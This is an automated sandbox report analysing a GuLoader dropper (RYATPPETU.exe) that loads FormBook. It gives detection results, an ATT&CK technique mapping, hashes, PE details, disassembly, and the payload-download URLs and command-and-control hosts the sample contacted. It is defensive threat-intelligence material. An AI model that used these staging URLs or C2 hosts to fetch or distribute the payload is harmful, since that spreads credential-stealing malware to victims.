Source: Yara match	File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Rootkit1	Credential API Hooking1	Security Software Discovery421	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion22	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection512	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol114	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information3	LSA Secrets	System Information Discovery12	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
RYATPPETU.exe	32%	Virustotal		Browse
RYATPPETU.exe	27%	ReversingLabs	Win32.Trojan.GuLoader
RYATPPETU.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
15.2.cmmon32.exe.549f840.4.unpack	100%	Avira	TR/Dropper.Gen	Download File
15.2.cmmon32.exe.3254318.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.2.RYATPPETU.exe.400000.0.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
8.0.RYATPPETU.exe.400000.2.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
8.0.RYATPPETU.exe.400000.3.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
8.0.RYATPPETU.exe.400000.0.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
8.0.RYATPPETU.exe.400000.1.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
0.0.RYATPPETU.exe.400000.0.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
blumeconstructionllc.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://blumeconstructionllc.com/bin_NX	0%	Avira URL Cloud	safe
https://blumeconstructionllc.com/bin_NXOEaeagUq10.binhttps://soleprotect.de/bin_NXOEaeagUq10.bin	0%	Avira URL Cloud	safe
https://soleprotect.de/bin_NXOEaeagUq10.bin	0%	Avira URL Cloud	safe
www.lrbounee.xyz/kb8y/	0%	Avira URL Cloud	safe
https://blumeconstructionllc.com/bin_NXOEaeagUq10.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.lrbounee.xyz	172.67.161.80	true	true		unknown
blumeconstructionllc.com	45.82.177.176	true	true	0%, Virustotal, Browse	unknown
www.etr6safvu8.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://blumeconstructionllc.com/bin_NX	true	Avira URL Cloud: safe	unknown
www.lrbounee.xyz/kb8y/	true	Avira URL Cloud: safe	low
https://blumeconstructionllc.com/bin_NXOEaeagUq10.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://blumeconstructionllc.com/bin_NXOEaeagUq10.binhttps://soleprotect.de/bin_NXOEaeagUq10.bin	RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://soleprotect.de/bin_NXOEaeagUq10.bin	RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.82.177.176	blumeconstructionllc.com	Netherlands		204601	ON-LINE-DATAServerlocation-NetherlandsDrontenNL	true
172.67.161.80	www.lrbounee.xyz	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	510462
Start date:	27.10.2021
Start time:	20:13:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 33s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	RYATPPETU.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/1@3/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 48.5% (good quality ratio 39.9%) Quality average: 67% Quality standard deviation: 36.2%
HCA Information:	Successful, ratio: 61% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 52.182.143.212, 13.89.179.12, 20.189.173.21, 23.211.4.86 Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, e1723.g.akamaiedge.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ON-LINE-DATAServerlocation-NetherlandsDrontenNL	Software updated by Dylox.exe	Get hash	malicious	Browse	185.203.240.16
	Genshin Hack v2.0.exe	Get hash	malicious	Browse	185.209.22.181
	FortniteModMenuInstallerV3.1.exe	Get hash	malicious	Browse	185.209.22.181
	HershyMM.exe	Get hash	malicious	Browse	185.209.22.181
	VapeClient.exe	Get hash	malicious	Browse	185.209.22.181
	PrimoHack.exe	Get hash	malicious	Browse	185.154.13.159
	GenshinHack.exe	Get hash	malicious	Browse	185.209.22.181
	Bitcoin Mining Software 1.5v.exe	Get hash	malicious	Browse	185.209.22.181
	3627seCzVp.exe	Get hash	malicious	Browse	92.119.113.189
	In8IsU6U9f.exe	Get hash	malicious	Browse	92.119.113.189
	DHL invoice KULIR00895239.pdf.exe	Get hash	malicious	Browse	80.89.235.209
	JMGEUaWEGo.exe	Get hash	malicious	Browse	185.213.211.110
	0sbusFRRjn.exe	Get hash	malicious	Browse	45.81.226.106
	B8s1kaAQnJ.exe	Get hash	malicious	Browse	185.209.22.181
	VYGellievj.exe	Get hash	malicious	Browse	185.244.217.5
	MVB56JJDeJ.exe	Get hash	malicious	Browse	185.244.217.166
	9h0UloHVo8.exe	Get hash	malicious	Browse	176.57.71.68
	AxieLoader.exe	Get hash	malicious	Browse	185.209.22.181
	VngAM1gAM3.exe	Get hash	malicious	Browse	80.89.234.187
	xTvIsmAee2.exe	Get hash	malicious	Browse	45.147.197.20
CLOUDFLARENETUS	bdumk5V3ry.exe	Get hash	malicious	Browse	172.67.188.154
	BBVA-Confirming Facturas Pagadas al Vencimiento.exe	Get hash	malicious	Browse	104.21.19.200
	sboPQqfpHN.exe	Get hash	malicious	Browse	162.159.134.233
	CtTYTpaAKA.exe	Get hash	malicious	Browse	172.67.216.2
	6TUQ9Lb5rN.exe	Get hash	malicious	Browse	172.67.190.175
	ezzvG6vQ5l.exe	Get hash	malicious	Browse	172.67.195.238
	Eh36aKpvNOXJcT8.exe	Get hash	malicious	Browse	104.21.19.200
	2098765434567890098765.exe	Get hash	malicious	Browse	172.67.188.154
	0987234567890.exe	Get hash	malicious	Browse	172.67.188.154
	LENEEsYC55YCboo.exe	Get hash	malicious	Browse	104.21.19.200
	oytu1F59dV.exe	Get hash	malicious	Browse	162.159.134.233
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse	162.159.134.233
	Betalingskvittering.exe	Get hash	malicious	Browse	104.21.40.182
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse	162.159.130.233
	10272021-AM65Application.HTM	Get hash	malicious	Browse	104.18.11.207
	x86_64	Get hash	malicious	Browse	104.28.249.1
	calculadora-trading-criptomonedas-binance-1 (1).apk	Get hash	malicious	Browse	172.67.169.191
	calculadora-trading-criptomonedas-binance-1 (1).apk	Get hash	malicious	Browse	172.67.169.191
	Nwszeclpfkywlsrvlpglyrnsilmxebigcs.exe	Get hash	malicious	Browse	162.159.133.233
	GAWEVQV50254.vbs	Get hash	malicious	Browse	104.21.41.22

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	#U0191ACTU#U0156A_wfpqacDkwlb__Z2676679.vbs	Get hash	malicious	Browse	45.82.177.176
	3weZ3HvFxH.exe	Get hash	malicious	Browse	45.82.177.176
	89764583937678458745989.html	Get hash	malicious	Browse	45.82.177.176
	10272021-AM65Application.HTM	Get hash	malicious	Browse	45.82.177.176
	protocol-1441399238.xls	Get hash	malicious	Browse	45.82.177.176
	Justificante de pago 876345864792456647625346347457453535.vbs	Get hash	malicious	Browse	45.82.177.176
	Nwszeclpfkywlsrvlpglyrnsilmxebigcs.exe	Get hash	malicious	Browse	45.82.177.176
	protocol-1086855687.xls	Get hash	malicious	Browse	45.82.177.176
	v2c.exe	Get hash	malicious	Browse	45.82.177.176
	sZFzUPz7Ee.exe	Get hash	malicious	Browse	45.82.177.176
	eMxXqjzvae.exe	Get hash	malicious	Browse	45.82.177.176
	1.xls	Get hash	malicious	Browse	45.82.177.176
	f25d7dae55dc8c848e9fed3f218f886f4ca4412e5b94a.exe	Get hash	malicious	Browse	45.82.177.176
	8cc8f28391efb0099a231da1df27d6acc2a9dbfdc11d5.exe	Get hash	malicious	Browse	45.82.177.176
	xmzY7ZAuZp.exe	Get hash	malicious	Browse	45.82.177.176
	d3vBGwu0wz.exe	Get hash	malicious	Browse	45.82.177.176
	aVBJuotMJ9.exe	Get hash	malicious	Browse	45.82.177.176
	5xPl3ZUYqx.exe	Get hash	malicious	Browse	45.82.177.176
	ATT51656.htm	Get hash	malicious	Browse	45.82.177.176
	FWWg6C0DM4.exe	Get hash	malicious	Browse	45.82.177.176

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DF4B4CC365E00E9684.TMP Download File
Process:	C:\Users\user\Desktop\RYATPPETU.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	1.4059290877904689
Encrypted:	false
SSDEEP:	48:rNlBAWKrwJT+zB0s48oBTAtLSllRGn4Zs:5lAk9UL48GMElRA
MD5:	2832C86BFA5DF1B4F0161397CF870C59
SHA1:	A75FBED32EC9920AAC454561327EE6D301B752D1
SHA-256:	33E5839910635EA050F70D96AA0A6EB468D0920A606382884D6CDC4B368421A7
SHA-512:	844156D22C9FD5E36D0F14DB6841F1F4A7DCF4F8BFA09CADA6314020EC6F8740A2C9665DB60D33EFDB7B84894901725DF7967770C220218BEB557D91E13679D1
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.09284402252112
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RYATPPETU.exe
File size:	131072
MD5:	7a4b8b634d2e94cd1e458af5918be3aa
SHA1:	b6989ba569206ab6527aff0f8bd3278371ef7953
SHA256:	056477676a6b327511c22c10e77e4e5f3653b40528109d7715a9e9efffb4d068
SHA512:	2388a76b5735ef5d9a0019fc88b8ddb9f4eb1fccf894e7352a178292187d84ba70d8388c56d2aad4d75309cbd2892c0283cb950cea8fadefb76053eff76c2af0
SSDEEP:	1536:QYT1mygowE78xN6Lr82r/GBWHQo5626Xx5aRx:10o5YirXzGYHB56Xxg3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...d...i.Rich..i.................PE..L....F.H.....................@......0.............@........................

File Icon


Icon Hash:	12f1f8deacde6cb0

Static PE Info

General
Entrypoint:	0x401130
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x48934696 [Fri Aug 1 17:23:34 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a69b89976d9c4cd319442a092a90877e

Entrypoint Preview

Instruction
push 004026D8h
call 00007F3B7CA3DED3h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dh, al
dec ebx
or byte ptr [eax+edi*2], dh
jle 00007F3B7CA3DF16h
inc edx
mov ch, 68h
cmp ch, byte ptr [ebx+2Bh]
salc
loopne 00007F3B7CA3DF26h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc ebx
outsd
insd
insd
outsd
outsd
jc 00007F3B7CA3DF47h
add byte ptr [ebx+02h], bh
cmp byte ptr [eax], cl
inc ecx
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
pop es
movsb
idiv dword ptr [ecx+esi*8+6Ch]
pop ds
dec ebx
cmpsb
leave
fistp word ptr [ecx]
test eax, C4F590FCh
inc esp
pop ebx
add al, 47h
fld tbyte ptr [edi+41h]
call far 255Ch : 2942040Ah
fdivr qword ptr [edx]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push cs
add byte ptr [eax], al
add ecx, dword ptr [04000000h]
add byte ptr [eax+72h], dl
outsd
bound eax, dword ptr [eax]
or eax, 42000401h
popad
je 00007F3B7CA3DEE2h
sbb dword ptr [ecx], eax
add byte ptr [edx+00h], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1cf84	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20000	0x111e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x220	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x78	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1c0b4	0x1d000	False	0.474592537716	data	6.32641082973	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1e000	0x1e84	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x20000	0x111e	0x2000	False	0.182983398438	data	2.46625216592	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
ERROR	0x20fe0	0x13e	MS Windows icon resource - 1 icon, 16x16, 16 colors	English	United States
RT_ICON	0x20338	0xca8	data
RT_GROUP_ICON	0x20324	0x14	data
RT_VERSION	0x20140	0x1e4	data	English	United States

Imports

DLL	Import
MSVBVM60.DLL	MethCallEngine, EVENT_SINK_AddRef, DllFunctionCall, EVENT_SINK_Release, EVENT_SINK_QueryInterface, __vbaExceptHandler

Version Infos

Description	Data
Translation	0x0409 0x04b0
ProductVersion	1.00
InternalName	RYATPPETU
FileVersion	1.00
OriginalFilename	RYATPPETU.exe
ProductName	Commodore

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2021 20:17:09.584096909 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:09.584145069 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:09.584297895 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:09.602543116 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:09.602571964 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:09.673856020 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:09.674012899 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.018652916 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.018697023 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.019912958 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.020032883 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.031068087 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.059653044 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.059716940 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.059952974 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.059982061 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.060067892 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.085839033 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.085994959 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.086015940 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.086045027 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.086106062 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.086114883 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.086144924 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.086169958 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.086179018 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.086219072 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.086251974 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.113292933 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.113467932 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.113610983 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.113687992 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.113713026 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.113729954 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.113827944 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.113878012 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.113893986 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.113924980 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.114020109 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.114039898 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.114069939 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.114115000 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.114152908 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.114166975 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.114761114 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.140347004 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.140520096 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.140619993 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.140675068 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.140700102 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.140754938 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.140805006 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.140821934 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.140913963 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.140914917 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.140943050 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141031027 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.141064882 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141168118 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.141206980 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141331911 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.141334057 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141354084 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141458988 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.141479969 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141583920 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.141606092 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141717911 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.141720057 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141740084 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141859055 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.169152021 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.169291973 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.169401884 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.169403076 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.169446945 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.169548035 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.169588089 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.169676065 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.170008898 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.170033932 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:18:51.265953064 CEST	49698	80	192.168.2.5	172.67.161.80
Oct 27, 2021 20:18:51.282932997 CEST	80	49698	172.67.161.80	192.168.2.5
Oct 27, 2021 20:18:51.283031940 CEST	49698	80	192.168.2.5	172.67.161.80
Oct 27, 2021 20:18:51.283169985 CEST	49698	80	192.168.2.5	172.67.161.80
Oct 27, 2021 20:18:51.300039053 CEST	80	49698	172.67.161.80	192.168.2.5
Oct 27, 2021 20:18:51.616200924 CEST	80	49698	172.67.161.80	192.168.2.5
Oct 27, 2021 20:18:51.616235971 CEST	80	49698	172.67.161.80	192.168.2.5
Oct 27, 2021 20:18:51.616251945 CEST	80	49698	172.67.161.80	192.168.2.5
Oct 27, 2021 20:18:51.616568089 CEST	49698	80	192.168.2.5	172.67.161.80
Oct 27, 2021 20:18:51.616662979 CEST	49698	80	192.168.2.5	172.67.161.80

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2021 20:17:09.543685913 CEST	54795	53	192.168.2.5	8.8.8.8
Oct 27, 2021 20:17:09.564801931 CEST	53	54795	8.8.8.8	192.168.2.5
Oct 27, 2021 20:18:28.939344883 CEST	49557	53	192.168.2.5	8.8.8.8
Oct 27, 2021 20:18:28.969048023 CEST	53	49557	8.8.8.8	192.168.2.5
